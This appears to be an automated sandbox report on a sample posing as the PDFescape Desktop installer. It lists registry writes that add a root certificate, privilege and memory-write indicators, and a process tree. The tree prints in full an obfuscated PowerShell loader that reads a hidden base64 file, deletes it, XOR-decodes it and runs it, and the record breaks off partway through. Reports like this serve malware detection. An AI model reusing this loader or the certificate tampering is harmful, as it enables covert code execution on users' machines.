e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 PDFescape_Desktop_Installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 PDFescape_Desktop_Installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 PDFescape_Desktop_Installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 PDFescape_Desktop_Installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 PDFescape_Desktop_Installer.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
escape.exepid process 11444 escape.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
PDFescape_Desktop_Installer.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3564 PDFescape_Desktop_Installer.exe 3564 PDFescape_Desktop_Installer.exe 3948 powershell.exe 3948 powershell.exe 4132 powershell.exe 4132 powershell.exe 4172 powershell.exe 4172 powershell.exe 2744 powershell.exe 2744 powershell.exe 2332 powershell.exe 2332 powershell.exe 3992 powershell.exe 3992 powershell.exe 4256 powershell.exe 4256 powershell.exe 4332 powershell.exe 4332 powershell.exe 4400 powershell.exe 4400 powershell.exe 4476 powershell.exe 4476 powershell.exe 3948 powershell.exe 2744 powershell.exe 3992 powershell.exe 2332 powershell.exe 4256 powershell.exe 4132 powershell.exe 4400 powershell.exe 4172 powershell.exe 4476 powershell.exe 4332 powershell.exe 3992 powershell.exe 2744 powershell.exe 3948 powershell.exe 2332 powershell.exe 4256 powershell.exe 4132 powershell.exe 4400 powershell.exe 4172 powershell.exe 4476 powershell.exe 4332 powershell.exe 3564 PDFescape_Desktop_Installer.exe 3564 PDFescape_Desktop_Installer.exe 4132 powershell.exe 4132 powershell.exe 3992 powershell.exe 3992 powershell.exe 4132 powershell.exe 3992 powershell.exe 4476 powershell.exe 4476 powershell.exe 4476 powershell.exe 4332 powershell.exe 4332 powershell.exe 4332 powershell.exe 4400 powershell.exe 4400 powershell.exe 4132 powershell.exe 4400 powershell.exe 4132 powershell.exe 3948 powershell.exe 3948 powershell.exe 3948 powershell.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
MicrosoftEdgeCP.exepid process 10116 MicrosoftEdgeCP.exe 10116 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exePDFescape_Desktop_Installer.exemsiexec.exevssvc.exedescription pid process Token: SeDebugPrivilege 3948 powershell.exe Token: SeDebugPrivilege 2332 powershell.exe Token: SeDebugPrivilege 3992 powershell.exe Token: SeDebugPrivilege 2744 powershell.exe Token: SeDebugPrivilege 4132 powershell.exe Token: SeDebugPrivilege 4172 powershell.exe Token: SeDebugPrivilege 4256 powershell.exe Token: SeDebugPrivilege 4332 powershell.exe Token: SeDebugPrivilege 4400 powershell.exe Token: SeDebugPrivilege 4476 powershell.exe Token: SeShutdownPrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeIncreaseQuotaPrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeSecurityPrivilege 1832 msiexec.exe Token: SeCreateTokenPrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeAssignPrimaryTokenPrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeLockMemoryPrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeIncreaseQuotaPrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeMachineAccountPrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeTcbPrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeSecurityPrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeTakeOwnershipPrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeLoadDriverPrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeSystemProfilePrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeSystemtimePrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeProfSingleProcessPrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeIncBasePriorityPrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeCreatePagefilePrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeCreatePermanentPrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeBackupPrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeRestorePrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeShutdownPrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeDebugPrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeAuditPrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeSystemEnvironmentPrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeChangeNotifyPrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeRemoteShutdownPrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeUndockPrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeSyncAgentPrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeEnableDelegationPrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeManageVolumePrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeImpersonatePrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeCreateGlobalPrivilege 3564 PDFescape_Desktop_Installer.exe Token: SeBackupPrivilege 5028 vssvc.exe Token: SeRestorePrivilege 5028 vssvc.exe Token: SeAuditPrivilege 5028 vssvc.exe Token: SeBackupPrivilege 1832 msiexec.exe Token: SeRestorePrivilege 1832 msiexec.exe Token: SeRestorePrivilege 1832 msiexec.exe Token: SeTakeOwnershipPrivilege 1832 msiexec.exe Token: SeRestorePrivilege 1832 msiexec.exe Token: SeTakeOwnershipPrivilege 1832 msiexec.exe Token: SeRestorePrivilege 1832 msiexec.exe Token: SeTakeOwnershipPrivilege 1832 msiexec.exe Token: SeRestorePrivilege 1832 msiexec.exe Token: SeTakeOwnershipPrivilege 1832 msiexec.exe Token: SeRestorePrivilege 1832 msiexec.exe Token: SeTakeOwnershipPrivilege 1832 msiexec.exe Token: SeRestorePrivilege 1832 msiexec.exe Token: SeTakeOwnershipPrivilege 1832 msiexec.exe Token: SeRestorePrivilege 1832 msiexec.exe Token: SeTakeOwnershipPrivilege 1832 msiexec.exe Token: SeRestorePrivilege 1832 msiexec.exe Token: SeTakeOwnershipPrivilege 1832 msiexec.exe Token: SeRestorePrivilege 1832 msiexec.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
PDFescape_Desktop_Installer.exepid process 3564 PDFescape_Desktop_Installer.exe 3564 PDFescape_Desktop_Installer.exe 3564 PDFescape_Desktop_Installer.exe 3564 PDFescape_Desktop_Installer.exe -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
PDFescape_Desktop_Installer.exepid process 3564 PDFescape_Desktop_Installer.exe 3564 PDFescape_Desktop_Installer.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exepid process 13580 MicrosoftEdge.exe 10116 MicrosoftEdgeCP.exe 10116 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.exe8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmpPDFescape_Desktop_Installer.exemsiexec.exedescription pid process target process PID 1832 wrote to memory of 1840 1832 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.exe 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp PID 1832 wrote to memory of 1840 1832 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.exe 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp PID 1832 wrote to memory of 1840 1832 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.exe 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp PID 1840 wrote to memory of 3564 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp PDFescape_Desktop_Installer.exe PID 1840 wrote to memory of 3564 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp PDFescape_Desktop_Installer.exe PID 1840 wrote to memory of 3564 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp PDFescape_Desktop_Installer.exe PID 3564 wrote to memory of 2104 3564 PDFescape_Desktop_Installer.exe regsvr32.exe PID 3564 wrote to memory of 2104 3564 PDFescape_Desktop_Installer.exe regsvr32.exe PID 3564 wrote to memory of 2104 3564 PDFescape_Desktop_Installer.exe regsvr32.exe PID 3564 wrote to memory of 3808 3564 PDFescape_Desktop_Installer.exe PDFescapeDesktopInstaller.exe PID 3564 wrote to memory of 3808 3564 PDFescape_Desktop_Installer.exe PDFescapeDesktopInstaller.exe PID 3564 wrote to memory of 3808 3564 PDFescape_Desktop_Installer.exe PDFescapeDesktopInstaller.exe PID 1840 wrote to memory of 3948 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 3948 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 3948 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 2744 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 2744 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 2744 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 2332 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 2332 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 2332 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 3992 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 3992 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 3992 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 4132 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 4132 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 4132 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 4172 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 4172 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 4172 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 4256 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 4256 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 4256 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 4332 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 4332 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 4332 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 4400 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 4400 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 4400 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 4476 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 4476 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1840 wrote to memory of 4476 1840 8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp powershell.exe PID 1832 wrote to memory of 18156 1832 msiexec.exe srtasks.exe PID 1832 wrote to memory of 18156 1832 msiexec.exe srtasks.exe PID 1832 wrote to memory of 10120 1832 msiexec.exe MsiExec.exe PID 1832 wrote to memory of 10120 1832 msiexec.exe MsiExec.exe PID 1832 wrote to memory of 7700 1832 msiexec.exe MsiExec.exe PID 1832 wrote to memory of 7700 1832 msiexec.exe MsiExec.exe PID 1832 wrote to memory of 10824 1832 msiexec.exe MsiExec.exe PID 1832 wrote to memory of 10824 1832 msiexec.exe MsiExec.exe PID 1832 wrote to memory of 13416 1832 msiexec.exe MsiExec.exe PID 1832 wrote to memory of 13416 1832 msiexec.exe MsiExec.exe PID 1832 wrote to memory of 13416 1832 msiexec.exe MsiExec.exe PID 1832 wrote to memory of 16564 1832 msiexec.exe ws.exe PID 1832 wrote to memory of 16564 1832 msiexec.exe ws.exe PID 1832 wrote to memory of 8076 1832 msiexec.exe MsiExec.exe PID 1832 wrote to memory of 8076 1832 msiexec.exe MsiExec.exe PID 1832 wrote to memory of 11140 1832 msiexec.exe updater-ws.exe PID 1832 wrote to memory of 11140 1832 msiexec.exe updater-ws.exe PID 1832 wrote to memory of 19072 1832 msiexec.exe MsiExec.exe PID 1832 wrote to memory of 19072 1832 msiexec.exe MsiExec.exe PID 1832 wrote to memory of 11876 1832 msiexec.exe MsiExec.exe PID 1832 wrote to memory of 11876 1832 msiexec.exe MsiExec.exe PID 1832 wrote to memory of 14080 1832 msiexec.exe MsiExec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.exe"C:\Users\Admin\AppData\Local\Temp\8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-6J7C8.tmp\8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp"C:\Users\Admin\AppData\Local\Temp\is-6J7C8.tmp\8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp" /SL5="$70050,111934780,999424,C:\Users\Admin\AppData\Local\Temp\8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-TVUP7.tmp\PDFescape_Desktop_Installer.exe"C:\Users\Admin\AppData\Local\Temp\is-TVUP7.tmp\PDFescape_Desktop_Installer.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe /s "C:\ProgramData\PDFescape Desktop\Installation\Statistics.dll"4⤵
- Loads dropped DLL
- Modifies registry class
-
C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe"C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe" /RegServer4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
